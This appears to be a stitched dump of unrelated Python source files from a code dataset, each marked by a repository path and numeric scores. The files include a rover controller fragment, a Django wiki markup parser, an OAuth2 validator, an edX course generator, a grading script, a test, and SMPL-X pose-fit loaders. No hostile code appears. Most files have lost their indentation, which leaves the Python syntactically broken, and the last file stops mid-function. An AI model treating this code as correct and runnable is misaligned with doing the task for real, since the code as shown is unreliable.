self.prev_cmd = [None,None]
if bt_flag and xbox_flag:
raise Exception( "[Rover init] Cannot initialize with both bluetooth and Xbox, run with only one argument")
elif bt_flag: self.connection_type = "b"
elif xbox_flag: self.connection_type = "x"
self.connectController()
def drive(self):
try:
v,r = self.getDriveVals()
            if (v, r) != self.prev_cmd:
                self.sendCommands(v, r)
                self.prev_cmd = (v, r)
except KeyboardInterrupt:
self.cleanup()
except Exception as e:
print(e)
self.cleanup()
time.sleep(0.5)
self.connectController()
if self.unix_flag:
try:
self.sendUnixData()
except Exception as e:
print(e)
self.unix_flag = 0
def cleanup(self):
self.killMotors()
self.closeConnections()
| 2.671875 | 3 |
aswiki/parser.py | scanner/django-aswiki | 0 | 3357 | <filename>aswiki/parser.py
#
# File: $Id: parser.py 1865 2008-10-28 00:47:27Z scanner $
#
"""
This is where the logic and definition of our wiki markup parser lives.
We use the Python Creoleparser (which requires Genshi)
We make a custom dialect so that the parser can know the URL base for
all of the topics (pages) in the wiki and some additional goop so that
we can tell what other topics a given topic refers to.
"""
# system imports
#
from urllib import quote
from urlparse import urlparse
try:
import threading
except ImportError:
import dummy_threading as threading
# Django imports
#
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
# 3rd party imports
#
from creoleparser.dialects import create_dialect, creole10_base, creole11_base
from creoleparser.core import Parser
from genshi import builder
# We see if we have the 'typogrify' app installed. If we do we will
# use it for rendering our templates to prettify them a bit.
#
try:
from typogrify.templatetags.typogrify import typogrify
except ImportError:
def typogrify(text):
return text
# Model imports
#
from aswiki.models import Topic
############################################################################
############################################################################
#
class TopicList(object):
"""
A helper class we use to keep track of all of the topics that are
referenced by the raw content for a specific topic. We pass the
    object's method 'path_fn' in to the 'path_func' parameter
    of the creole dialect we are going to generate.
The point of this class is that we need to know what topics are
referenced by a specific topic when its content is created or
modified. This lets us know that list of topics by their topic
names.
"""
########################################################################
#
def __init__(self):
"""
Very plain init. We set up the attribute for tracking topics.
"""
# The current topic that is being rendered, if we know it. This
# lets us root image url's relative to this topic.
#
self.current_topic = None
# The list of topics that we have encountered while rendering
# some content. This should be reset between renders.
#
self.topics = []
# A dict mapping the lower case topic name to the original case used
# in the text being parsed. This is so we can preserve the case
# when doing things like creating nascent topics.
#
self.topics_case = { }
# This is another list. It contains Topic's that we have
# found this topic referring to not via [[wiki links]] but via
# other methods like the <<subtopics >> macro. We need this so
# that when we are done rendering we can find out what other topics
# we should list in this topic's references.
#
self.extra_references = []
# This is a bit of ugliness. Since we instantiate a TopicList and pass
# a method when we create an instance of a Creole _dialect_ this one
# instance will be shared across this process instance which may well
# exist across multiple calls to render text via the parser generated
# from the dialect, which means our list of topics will grow every
# time we render a document.
#
# However, this is a problem since for our current use we only want
# the topic names from rendering a single topic. So we have to make
# sure no other thread of execution (if there are other threads
# running.. if not this is a cheap operation.. XXX I think) modifies
# the topic list we have to provide a mutex so only one thread at a
# time can add topics to a topic list.
#
self.lock = threading.Lock()
return
########################################################################
#
def clear_and_lock(self):
"""
Locks the mutex to prevent conflicts on updating the topic list if
more then one thread tries to render using the same dialect instance
at the same time.
"""
self.lock.acquire()
self.topics = []
self.topics_case = { }
self.extra_references = []
return
########################################################################
#
def unlock(self):
"""
Unlocks the mutex. Do NOT access the topics parameter after this is
called. You can not be guaranteed whose list of topics you are seeing.
"""
self.lock.release()
return
##################################################################
#
def image_fn(self, image_name):
"""
This is called by our creole parser every time it hits an
image link. This lets us translate image names to be relative
to the topic they are found in as appropriate.
We only apply this magic transformation for images url's that
are relative.
Arguments:
- `image_name`: The name of the image being referenced.
"""
# If the image url is NOT absolute, root it relative to this
# topic.
#
u = urlparse(image_name)
if self.current_topic and len(u.path) > 0 and u.path[0] != "/":
return self.current_topic + "/" + image_name
return image_name
########################################################################
#
def path_fn(self, topic_name):
"""
This is called by our creole parser every time it encounters a
wiki link in the text it is parsing. This lets us track which
topics this text refers to.
We are passed in a topic name, and we return that topic
name.. if we were doing some sort of transformation on topic
names this is where it would happen.
Arguments:
- `topic_name`: The topic name being referenced as a wiki link.
"""
lower_topic_name = topic_name.lower()
# if this is a topic name we have not seen yet, add it to our list
# of topics.
#
if lower_topic_name not in self.topics:
self.topics.append(lower_topic_name)
self.topics_case[lower_topic_name] = topic_name
return topic_name
############################################################################
#
def class_fn(topic_name):
"""
This function is invoked by the markup dialect every time it encounters a
wiki topic. It returns a string that is the css class name to add to wiki
links as they are turned in to proper <a href></a> links.
We use this as a way to annotate topics that do not exist yet with some
graphical attribute so that users can easily tell which topics are not yet
created.
We use the wiki.models.TopicManager's css_class_name method to do this
lookup.
NOTE: Since this module is imported by the wiki.models module we need to
import that module inside here so that we can access the Topic
model. This is cheap since it will already be imported.
Arguments:
- `topic_name`: the topic name being checked for existence.
"""
# XXX This is where we should do a cache lookup of the topic name
# and only if that fails fall back to
# Topic.objects.css_class_name(topic_name)
#
return Topic.objects.css_class_name(topic_name)
####################################################################
#
def output_mailto(arg_string):
"""
    Given the argument of a mailto macro, output the proper genshi
    stream that will render a mailto link. We also need to support the magic
    argument string format of '<you> AT <word> AT <foo> DOT <foo>'
    Arguments:
    - `arg_string`: The argument string of the mailto macro.
"""
# XXX Need to support the fancy format.. but for now just get the basic
# working.
return builder.tag.a(arg_string, href="mailto:%s" % arg_string)
####################################################################
#
def output_subtopics(arg_string):
"""
This will take a single string as its input. It will find all
topics for which the string as a topic name is the parent topic.
There is some semantic magic in a topic if it contains periods, ie: the
'.' character. This forms a kind of hierarchy. Loosely speaking all topics
that start with the same prefix, separated by '.' are sub-topics.
So: 2007.Agenda is a sub-topic of 2007. 2007.Agenda.foo is a subtopic of
2007 and 2007.Agenda.
    This macro will insert into the output a <ul> of the topics that are proper
subtopics of the given string, ordered by name. So in the above example if
I were to say <<subtopics 2007>> it would give me "2007.Agenda" and
"2007.Agenda.foo" in a <ul>
If the arg string ends with a dot, then it is treated as the
separator. ie: <<subtopics 2007.>> and <<subtopics 2007>> are identical.
Arguments:
- `arg_string`: The topic we want to find all subtopics of.
"""
if arg_string[-1] != '.':
arg_string = arg_string + "."
topics = Topic.objects.filter(lc_name__istartswith = arg_string.lower()).order_by('lc_name')
if topics.count() == 0:
return None
ul = builder.tag.ul()
# For every topic that matches our pattern we insert a 'li' link
# to that topic in our output. We also add this topic to the
# 'extra_references' list in our global TOPIC_LIST object. This is
# so that the prerender../save() methods of the Topic object we are
# rendering this output for can know to add those topics to the list
# of topics referenced by the topic being rendered.
for topic in topics:
TOPIC_LIST.extra_references.append(topic)
ul.append(builder.tag.li(builder.tag.a(topic.name,
href = topic.get_absolute_url())))
return ul
####################################################################
#
def output_attachments(arg_string):
"""
Returns a <ul> of all of the attachments attached to the topic name
given as the arg_string.
Arguments:
- `arg_string`: Expected to be the name of a topic. If no such topic
exist, then no attachment list is generated.
"""
try:
topic = Topic.objects.get(lc_name = arg_string.lower())
except Topic.DoesNotExist:
return None
ul = builder.tag.ul()
# For every file attachment on this topic, add a 'li' link
# to that attachment.
#
for attachment in topic.file_attachments.all():
ul.append(builder.tag.li(builder.tag.a(attachment.basename(),
href = attachment.get_absolute_url())))
return ul
####################################################################
#
def macro_fn(name, arg_string, macro_body, block_type, environ):
"""
Handles the macros we define for our version of markup.
Arguments:
- `name`: The name of the macro
- `arg_string`: The argument string, including any delimiters
- `macro_body`: The macro body, None for macro with no body.
- `block_type`: True for block type macros.
- `environ` : The environment object, passed through from
creoleparser.core.Parser class's 'parse()' method.
"""
name = name.strip().lower()
arg_string = arg_string.strip()
if name == 'anchor':
if block_type:
return builder.tag.a(macro_body, name = arg_string)
else:
return builder.tag.a(name = arg_string)
elif name == 'mailto':
return output_mailto(arg_string)
elif name == 'gettext':
if block_type:
return _(macro_body)
else:
return _(arg_string)
elif name == 'subtopics':
return output_subtopics(arg_string)
elif name == 'attachlist':
return output_attachments(arg_string)
elif name == 'attachment':
# For including downloadable attachments in a wiki document.
if block_type:
return builder.tag.a(macro_body, href=arg_string)
else:
return builder.tag.a(arg_string, href=arg_string)
return None
##
## Create our custom dialect. It will use our class function and a TopicList
## instance. The root URL for all wiki topics will be the same as the
## 'aswiki_topic_index' url.
##
## NOTE: This assumes that the url for a specific Topic is the same as the url
## for the aswiki_topic_index with the Topic name appended to it
##
TOPIC_LIST = TopicList()
# dialect = creoleparser.dialects.Creole10(
# wiki_links_base_url = reverse('aswiki_topic_index'),
# wiki_links_space_char = '%20',
# use_additions = True,
# no_wiki_monospace = False,
# wiki_links_class_func = class_fn,
# wiki_links_path_func = TOPIC_LIST.path_fn,
# macro_func = macro_fn,
# interwiki_links_base_urls=dict(wikicreole='http://wikicreole.org/wiki/',
# wikipedia='http://wikipedia.org/wiki/',)
# )
parser = Parser(dialect = create_dialect(\
creole11_base,
wiki_links_base_url = reverse('aswiki_topic_index'), # NOTE: Make this
# a two element
# list for images
# to be loaded
# from a separate
# URL
wiki_links_space_char = '%20', # NOTE: make this a two element list to
# give images a different space
# character.
no_wiki_monospace = False,
wiki_links_class_func = class_fn,
wiki_links_path_func = (TOPIC_LIST.path_fn,
TOPIC_LIST.image_fn),
bodied_macros = { },
non_bodied_macros = { },
macro_func = macro_fn,
# custom_markup = (),
interwiki_links_base_urls = {
'wikicreole' : 'http://wikicreole.org/wiki/',
'wikipedia' :'http://wikipedia.org/wiki/' }
))
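# A rough usage sketch of the locking protocol documented on TopicList above. The
# attribute names on `topic` and the exact render call are assumptions -- use
# whatever creoleparser entry point and Topic fields the surrounding code relies on:
#
#     TOPIC_LIST.clear_and_lock()
#     try:
#         TOPIC_LIST.current_topic = topic.name
#         html = parser.render(topic.raw_content)
#         referenced = list(TOPIC_LIST.topics)          # lower-cased topic names
#         extra = list(TOPIC_LIST.extra_references)     # Topic objects added by macros
#     finally:
#         TOPIC_LIST.unlock()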
| 2.703125 | 3 |
oauth_api/validators.py | anobi/django-oauth-api | 0 | 3358 | <reponame>anobi/django-oauth-api
import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
Check that and Application exists with given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
        Ensure the username and password are valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
| 2.40625 | 2 |
objects/fun_return.py | padmacho/pythontutorial | 0 | 3359 | def modify(y):
return y # returns same reference. No new object is created
x = [1, 2, 3]
y = modify(x)
print("x == y", x == y)
print("x == y", x is y) | 3.984375 | 4 |
edx_gen/_write_comps.py | hberndl70/mooc-generator | 0 | 3360 | import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
    meta_tag = h1_tags[0]  # the first h1 tag should contain the metadata
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| 2.125 | 2 |
grading_program.py | ByeonghoonJeon/Student-Grading | 0 | 3361 | # 1. Create students score dictionary.
students_score = {}
# 2. Input student's name and check if input is correct. (Alphabet, period, and blank only.)
# 2.1 Create a function that evaluates the validity of the name.
def check_name(name):
    # 2.1.1 Remove periods and blanks, then check that the name consists of alphabetic characters only.
# 2.1.1.1 Make a list of spelling in the name.
list_of_spelling = list(name)
# 2.1.1.2 Remove period and blank from the list.
while "." in list_of_spelling:
list_of_spelling.remove(".")
while " " in list_of_spelling:
list_of_spelling.remove(" ")
# 2.1.1.3 Convert the list to a string.
list_to_string = ""
list_to_string = list_to_string.join(list_of_spelling)
    # 2.1.1.4 Return whether the string is alphabetic.
return list_to_string.isalpha()
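# Example behaviour (for illustration): check_name("St. John Smith") returns True,
# while check_name("R2D2") returns False because digits are not alphabetic.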
while True:
# 2.2 Input student's name.
name = input("Please input student's name. \n")
check_name(name)
# 2.3 Check if the name is alphabet. If not, ask to input correct name again.
while check_name(name) != True:
name = input("Please input student's name. (Alphabet and period only.)\n")
# 3. Input student's score and check if input is correct. (digits only and between zero and 100)
score = input(f"Please input {name}'s score.(0 ~ 100)\n")
while score.isdigit() == False or int(score) not in range(0, 101):
score = input("Please input valid numbers only.(Number from zero to 100.)\n")
students_score[name] = score
# 4. Ask another student's information.
another_student = input(
"Do you want to input another student's information as well? (Y/N)\n"
)
while another_student.lower() not in ("yes", "y", "n", "no"):
# 4.1 Check if the input is valid.
another_student = input("Please input Y/N only.\n")
if another_student.lower() in ("yes", "y"):
continue
elif another_student.lower() in ("no", "n"):
break
for student in students_score:
score = students_score[student]
score = int(score)
if score >= 90:
students_score[student] = "A"
elif score in range(70, 90):
students_score[student] = "B"
elif score in range(50, 70):
students_score[student] = "C"
elif score in range(40, 50):
students_score[student] = "D"
else:
students_score[student] = "F"
print(students_score)
| 4.3125 | 4 |
test/test_utils.py | by46/recipe | 0 | 3362 | import unittest
from recipe import utils
class UtilTestCase(unittest.TestCase):
def test_valid_project_slug(self):
project_slug = "Recipe0123456789_mock"
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = 'Recipe00000000000000000000000000000000000000000000'
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = ""
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "Recipe000000000000000000000000000000000000000000001"
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "-!@#$%^&*()_+"
self.assertFalse(utils.valid_project_slug(project_slug))
| 3 | 3 |
extern/smplx_kinect/smplx_kinect/common/avakhitov_utils.py | wangxihao/rgbd-kinect-pose | 1 | 3363 | import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
            for j in range(0, pose_body_mats.shape[0]):
                rot_vec, jac = cv2.Rodrigues(pose_body_mats[j])
                pose_body[3 * j: 3 * j + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
